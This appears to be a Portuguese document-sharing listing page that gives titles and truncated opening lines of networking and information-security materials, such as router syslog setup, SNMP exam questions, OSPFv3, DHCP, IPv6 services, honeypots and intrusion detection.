Configuração do log de sistema no Roteadores RV016, RV042, RV042G e RV082 VPN Objetivo Um log de sistema (Syslog) é usado para registrar dados do computador. Você pode definir os exemplos que gerarão um
QUESTÕES SOBRE GERÊNCIA DE REDES
QUESTÕES SOBRE GERÊNCIA DE REDES A SEGUIR 15 QUESTÕES DE CONCURSOS MEC 2011 - CESPE - ATIVIDADE TÉCNICA DE COMPLEXIDADE GERENCIAL - ANALISTA DE SISTEMA OPERACIONAL 1. Tendo como base o protocolo SNMP,
Configurar OSPFv3 como o protocolo PE-CE com técnicas de prevenção do laço
Configurar OSPFv3 como o protocolo PE-CE com técnicas de prevenção do laço Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Informações de Apoio Configurar Diagrama de Rede Configuração
Detecção de Intrusão
Detecção de Intrusão IBTA Pós!Graduação e" Segurança d# Sistemas Prof. Andr$ Grégio, M.Sc. 27/06/2009 Roteiro Manhã: Projeto Honeynet Honeypots Novas tendências de honeypots Th# Honeyne% Projec% Veio a
Um Agente SNMP para Detecção de Intrusão Baseada na Interação de Protocolos
Um Agente SNMP para Detecção de Intrusão Baseada na Interação de Protocolos Edgar Meneghetti (UFRGS) Luciano Paschoal Gaspary (UNISINOS) Liane Tarouco (UFRGS) 20 o Simpósio Brasileiro de Redes de Computadores
5º Fórum Brasileiro de CSIRTs 23 de setembro de 2016 São Paulo, SP
5º Fórum Brasileiro de CSIRTs 23 de setembro de 2016 São Paulo, SP Para onde vão as "coisas"? Uma reflexão sobre o impacto da IoT no tratamento de incidentes de segurança Cristine Hoepers cristine@cert.br
Guia de Segurança do Oracle Hardware Management Pack para Oracle Solaris 11.3
Guia de Segurança do Oracle Hardware Management Pack para Oracle Solaris 11.3 Número do Item: E76543-02 Março de 2017 Conteúdo Visão Geral da Segurança do Produto e do Aplicativo... 5 Sobre o Oracle Hardware
ROTEAMENTO REDES E SR1 ETER-FAETEC. Rio de Janeiro - RJ ETER-FAETEC
ROTEAMENTO REDES E SR1 Rio de Janeiro - RJ INTRODUÇÃO A comunicação entre nós de uma rede local é realizada a partir da comutação (seja por circuito, seja por pacotes). Quem realiza essa função é o switch
Capacitação IPv6.br. Serviços em IPv6. Serviços rev
Capacitação IPv6.br Serviços em IPv6 Agenda Motivação Serviços Implementações DNS NTP Servidores HTTP Proxies SMB CIFS ( SAMBA ) Motivação Provedor de Acesso Provedor de Conteúdo 06 de Junho de 2012 Serviços
CEA463 SEGURANÇA E AUDITORIA DE SISTEMAS
CEA463 SEGURANÇA E AUDITORIA DE SISTEMAS Universidade Federal de Ouro Preto Profa. Msc. Helen de DECEA Cássia / S. João da Monlevade Costa Lima Universidade Federal de Ouro Preto Definição
Honeypots Conhecendo o inimigo
Honeypots Conhecendo o inimigo Definição Um honeypot é um serviço de rede feito para ser atacado e comprometido, pois seu objetivo é fornecer informações de valor inestimável (Spitzner, 2003) Honeypots
Planeamento e Gestão de Redes. Simulação de Redes IP
PGRE SIM1 Planeamento e Gestão de Redes Simulação de Redes IP Manuel P. Ricardo Faculdade de Engenharia da Universidade do Porto PGRE SIM2 Como usar um simulador de redes e, em particular, o simulador
Servidor DHCP Dynamic Host Configuration Protocol
Servidor DHCP Dynamic Host Configuration Protocol IFSC UNIDADE DE SÃO JOSÉ CURSO TÉCNICO SUBSEQUENTE DE TELECOMUNICAÇÕES! Prof. Tomás Grimm DHCP Numa rede de Arquitetura TCP/IP, todo computador tem que
Segurança da Informação
Universidade Federal do Rio de Janeiro Centro de Ciências Jurídicas e Econômicas Faculdade de Administração e Ciências Contábeis Biblioteconomia e Gestão de Unidades de Informação Segurança da Informação